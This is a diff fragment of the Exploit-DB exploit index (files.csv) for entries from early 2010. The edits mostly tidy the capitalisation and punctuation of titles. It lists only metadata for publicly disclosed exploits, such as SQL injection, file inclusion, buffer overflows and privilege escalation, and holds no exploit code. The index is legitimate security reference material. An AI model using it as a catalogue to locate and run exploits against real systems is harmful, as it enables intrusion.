write",2010-01-03,"Ubik and er",php,webapps,0 -10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 +10979,platforms/php/webapps/10979.txt,"Joomla Component com_oziogallery2 - / IMAGIN Arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 +10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour",2010-01-04,emgent,linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News - 'newsdetail.php' SQL Injection (2)",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 -10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads 1.0 - Remote File Upload",2010-01-04,kaMtiEz,php,webapps,0 +10984,platforms/php/webapps/10984.txt,"Joomla Component com_cartikads 1.0 - Remote File Upload",2010-01-04,kaMtiEz,php,webapps,0 10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - File Inclusion",2010-01-04,indoushka,php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects - Blind SQL Injection",2010-01-04,Pyske,php,webapps,0 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps,0 -11003,platforms/php/webapps/11003.txt,"LightOpen CMS 0.1 - Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 -11005,platforms/asp/webapps/11005.txt,"KMSoft GuestBook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 +11003,platforms/php/webapps/11003.txt,"LightOpenCMS 0.1 - (smarty.php) Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps,0 +11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0 11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 @@ -10147,7 +10148,7 @@ id,file,description,date,author,platform,type,port 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authenticated) Remote Buffer Overflow Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0 @@ -10160,8 +10161,8 @@ id,file,description,date,author,platform,type,port 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king - Blind SQL Injection",2010-01-06,Pyske,php,webapps,0 -11036,platforms/php/webapps/11036.txt,"RoundCube Webmail - Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 -11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 +11036,platforms/php/webapps/11036.txt,"Roundcube Webmail - Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 +11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor - Arbitrary File Upload",2010-01-06,j4ck,php,webapps,0 11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BoF - bindshell",2010-01-06,sinn3r,windows,local,0 @@ -10180,7 +10181,7 @@ id,file,description,date,author,platform,type,port 11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)",2010-01-08,superli,windows,dos,0 11068,platforms/php/webapps/11068.txt,"Joomla Component com_ksadvertiser - SQL Injection",2010-01-08,FL0RiX,php,webapps,0 11069,platforms/php/webapps/11069.txt,"DELTAScripts PHPLinks - 'catid' SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 -11070,platforms/windows/dos/11070.txt,"Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 +11070,platforms/windows/dos/11070.txt,"Microsoft Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds - 'rate.php' Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0 11076,platforms/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 @@ -10190,7 +10191,7 @@ id,file,description,date,author,platform,type,port 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 11083,platforms/php/webapps/11083.txt,"phpMDJ 1.0.3 - SQL Injection",2010-01-10,"k4cp3r and Ablus",php,webapps,0 11084,platforms/windows/dos/11084.pl,"Real Player - Local Crash (PoC)",2010-01-10,"D3V!L FUCKER",windows,dos,0 -11085,platforms/php/webapps/11085.txt,"Alex GuestBook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 +11085,platforms/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 11086,platforms/php/webapps/11086.txt,"Joomla Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11087,platforms/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps,0 11088,platforms/php/webapps/11088.txt,"Joomla Component com_jcollection - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 @@ -10227,15 +10228,15 @@ id,file,description,date,author,platform,type,port 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11136,platforms/php/webapps/11136.txt,"Public Media Manager - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 -11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - (.ini) Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0 +11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,php,webapps,0 11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 -11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (Itunes & Quicktime etc)",2010-01-15,Dr_IDE,multiple,dos,0 +11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc)",2010-01-15,Dr_IDE,multiple,dos,0 11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite (PoC)",2010-01-15,Darkb0x,windows,dos,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite",2010-01-15,"Mert SARICA",windows,local,0 11147,platforms/php/webapps/11147.txt,"Max's File Uploader - Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0 -11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - (.rt) Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 +11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 / 2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 @@ -10244,7 +10245,7 @@ id,file,description,date,author,platform,type,port 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusion",2010-01-16,"cr4wl3r ",php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 -11159,platforms/php/webapps/11159.txt,"DasForum - (layout) Local File Inclusion Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 +11159,platforms/php/webapps/11159.txt,"DasForum - (layout) Local File Inclusion",2010-01-16,"cr4wl3r ",php,webapps,0 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH)",2010-01-16,Red-D3v1L,windows,local,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10256,13 +10257,13 @@ id,file,description,date,author,platform,type,port 11169,platforms/php/webapps/11169.txt,"Max's Image Uploader - Arbitrary File Upload",2010-01-17,indoushka,php,webapps,0 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,remote,0 -11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX - Remote Exec (PoC)",2010-01-17,superli,windows,remote,0 -11174,platforms/windows/local/11174.c,"VLC 0.8.6 a/b/c/d - (.ASS) Buffer Overflow (Win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 +11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment ActiveX - Remote Exec (PoC)",2010-01-17,superli,windows,remote,0 +11174,platforms/windows/local/11174.c,"VLC 0.8.6 a/b/c/d - '.ass' Buffer Overflow (Win32 Universal)",2010-01-17,"fl0 fl0w",windows,local,0 11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime - Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros - SQL Injection",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2 - Buffer Overflow",2010-01-18,"John Babio",windows,remote,0 -11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - (.mp3) Local Denial of Service (Denial of Service)",2010-01-18,Red-D3v1L,windows,dos,0 +11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service (Denial of Service)",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilities",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps,0 @@ -10276,10 +10277,10 @@ id,file,description,date,author,platform,type,port 11192,platforms/windows/dos/11192.txt,"OpenOffice - '.slk' Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 -11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos,0 +11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - '.smi' Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 -11202,platforms/windows/local/11202.pl,"RM Downloader - .m3u Buffer Overflow (SEH)",2010-01-19,jacky,windows,local,0 +11202,platforms/windows/local/11202.pl,"RM Downloader - '.m3u' Buffer Overflow (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 @@ -10289,11 +10290,11 @@ id,file,description,date,author,platform,type,port 11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0 11213,platforms/php/webapps/11213.txt,"Joomla Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0 -11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)",2010-01-21,SarBoT511,windows,dos,0 +11214,platforms/windows/dos/11214.html,"Microsoft Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)",2010-01-21,SarBoT511,windows,dos,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos,0 -11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 +11218,platforms/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver - SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0 @@ -10301,7 +10302,7 @@ id,file,description,date,author,platform,type,port 11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic ",php,webapps,0 11225,platforms/php/webapps/11225.txt,"Joomla Component com_gurujibook - SQL Injection",2010-01-22,snakespc,php,webapps,0 11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies - SQL Injection",2010-01-22,snakespc,php,webapps,0 -11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - (.mp3) Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 +11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin User)",2010-01-22,Stack,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - shdrv.sys Local kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 @@ -10314,7 +10315,7 @@ id,file,description,date,author,platform,type,port 11239,platforms/php/webapps/11239.txt,"Joomla (JBDiary) - Blind SQL Injection",2010-01-23,B-HUNT3|2,php,webapps,0 11240,platforms/php/webapps/11240.txt,"OpenDb 1.5.0.4 - Multiple Local File Inclusion",2010-01-23,"ViRuSMaN ",php,webapps,0 11243,platforms/windows/webapps/11243.txt,"Joomla (com_mochigames) - SQL Injection",2010-01-24,B-HUNT3|2,windows,webapps,0 -11244,platforms/php/webapps/11244.txt,"Silverstripe 2.3.5 - Cross-Site Request Forgeryorgery / Open Redirection",2010-01-24,"cp77fk4r ",php,webapps,0 +11244,platforms/php/webapps/11244.txt,"Silverstripe 2.3.5 - Cross-Site Request Forgeryorgery / Open redirection",2010-01-24,"cp77fk4r ",php,webapps,0 11245,platforms/windows/dos/11245.txt,"Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 @@ -10339,13 +10340,13 @@ id,file,description,date,author,platform,type,port 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0 11276,platforms/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 - NULL pointer crashes",2010-01-20,Skylined,windows,dos,0 11277,platforms/php/webapps/11277.txt,"Joomla Component com_ccnewsletter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0 -11278,platforms/php/webapps/11278.txt,"NovaBoard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0 +11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0 11279,platforms/php/webapps/11279.txt,"Joomla Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11280,platforms/php/webapps/11280.txt,"Joomla Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 11282,platforms/php/webapps/11282.txt,"Joomla Component com_ccnewsletter - Local File Inclusion",2010-01-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0 -11286,platforms/php/webapps/11286.txt,"Joomla JReservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 +11286,platforms/php/webapps/11286.txt,"Joomla Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla Component JE Quiz - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11288,platforms/multiple/dos/11288.py,"Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow",2010-01-29,babi,multiple,dos,0 11289,platforms/php/webapps/11289.txt,"Joomla Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0 @@ -10369,13 +10370,13 @@ id,file,description,date,author,platform,type,port 11309,platforms/php/webapps/11309.txt,"Snif 1.5.2 - Any Filetype Download Exploit",2010-02-01,Aodrulez,php,webapps,0 11310,platforms/asp/webapps/11310.txt,"RaakCMS - Multiple Vulnerabilities",2010-02-01,"Pouya Daneshmand",asp,webapps,0 11311,platforms/php/webapps/11311.txt,"Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)",2010-02-01,The.Morpheus,php,webapps,0 -11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (password field) Universal Buffer Overflow Exploit",2010-02-02,mr_me,windows,local,0 -11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 - .dbr file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 +11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow Exploit",2010-02-02,mr_me,windows,local,0 +11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,php,webapps,0 11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,windows,local,0 11318,platforms/php/webapps/11318.txt,"Dlili Script - SQL Injection",2010-02-02,Dr.DaShEr,php,webapps,0 11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 -11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash (PoC)",2010-02-02,SkuLL-HackeR,windows,dos,0 +11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - '.mp3' Local Crash (PoC)",2010-02-02,SkuLL-HackeR,windows,dos,0 11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - (Add Admin) Cross-Site Request Forgery",2010-02-03,"Milos Zivanovic ",php,webapps,0 11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Authentication Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10386,13 +10387,13 @@ id,file,description,date,author,platform,type,port 11328,platforms/windows/remote/11328.py,"UplusFtp Server 1.7.0.12 - Remote Buffer Overflow",2010-02-04,b0telh0,windows,remote,0 11329,platforms/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,php,webapps,0 11330,platforms/windows/webapps/11330.txt,"ManageEngine OpUtils 5 - 'Login.DO' SQL Injection",2010-02-04,"Asheesh Anaconda",windows,webapps,0 -11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - reversible encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 +11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,"cr4wl3r ",windows,dos,0 11333,platforms/windows/local/11333.pl,"FoxPlayer 1.7.0 - '.m3u' Local Buffer Overflow",2010-02-05,"cr4wl3r ",windows,local,0 11334,platforms/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection",2010-02-05,kaMtiEz,php,webapps,0 11336,platforms/php/webapps/11336.txt,"Open Bulletin Board - Multiple Blind SQL Injection",2010-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla (com_photoblog) - Blind SQL Injection",2010-02-06,"ALTBTA ",php,webapps,0 -11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap Buffer Overflow Exploit",2010-02-06,TecR0c,windows,dos,0 +11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory Corruption Heap Buffer Overflow Exploit",2010-02-06,TecR0c,windows,dos,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Remote File Upload",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 @@ -10419,8 +10420,8 @@ id,file,description,date,author,platform,type,port 11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",windows,dos,0 11364,platforms/multiple/local/11364.txt,"LDAP - Injection (PoC)",2010-02-09,"mc2_s3lector ",multiple,local,0 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Remote File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 -11366,platforms/php/webapps/11366.txt,"Newsletter Tailor - Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 -11367,platforms/php/webapps/11367.txt,"Newsletter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 +11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 +11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 @@ -10428,7 +10429,7 @@ id,file,description,date,author,platform,type,port 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script - Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload",2010-02-09,JIKO,php,webapps,0 -11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 +11378,platforms/php/webapps/11378.txt,"NewsLetter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow",2010-02-09,"fl0 fl0w",windows,local,0 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0 11382,platforms/php/webapps/11382.txt,"eSmile Script - 'index.php' SQL Injection",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10443,7 +10444,7 @@ id,file,description,date,author,platform,type,port 